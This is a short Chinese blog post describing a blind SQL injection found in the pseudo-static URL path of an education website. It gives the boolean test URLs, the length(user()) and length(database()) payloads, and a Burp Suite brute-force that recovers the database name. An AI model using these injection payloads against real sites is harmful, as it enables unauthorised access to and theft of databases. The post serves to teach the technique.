干货!一次伪静态页面的SQL注入!白帽黑客实战
上官雨宝2022-07-20 08:35:00
干货!一次伪静态页面的SQL注入!白帽黑客实战
涉及技能点
- SQL注入基础原理
- 盲注常用函数及思路
- burpsuite基础知识
过程记录
1.发现
在翻阅一EDU站点时,发现路径中带有明显的数字参数

好像与我们平时习惯的xxx.php?id=不同呃
2.尝试注入
按照以往习惯,先用order by探探底,结果翻车了…应该有自定义逻辑在过滤敏感关键词。

继续努力,峰回路转,耶~~~!
构造boolen等式时能够被带入查询语句并显示不同效果
当条件不符合时,71-false=71,显示71.html,无数据
http://EDU_SITE/.../..._id/71-false.html => SELECT ..FROM .. WHERE ... AND _id=71-false

而当条件符合时,71-true=70,显示70.html,有数据
http://EDU_SITE/.../..._id/71-true.html => SELECT ..FROM .. WHERE ... AND _id=71-true

3.确定攻击方式,获取数据进行验证
获取用户名长度
http://EDU_SITE/.../..._id/71-(length(user())=12).html => SELECT ..FROM .. WHERE ... AND _id=71-(length(user())=12)

获取数据库长度
http://EDU_SITE/.../..._id/71-(length(database())=6).html => SELECT ..FROM .. WHERE ... AND _id=71-(length(database())=6)

尝试用burpsuite的clusterboom模式对database进行爆破
其中参数1 为位数,参数2 为可能出现的字符明文


获得最终database()=db_cms

总结
在尝试sql注入的时候,往往过分关注get传参或者post传参而忽略了URL中自带的注入点,有时候一些明显的数字型参数也能够带入payload
文章转自公众号:网络安全与黑客技术
上官雨宝
是水水水水是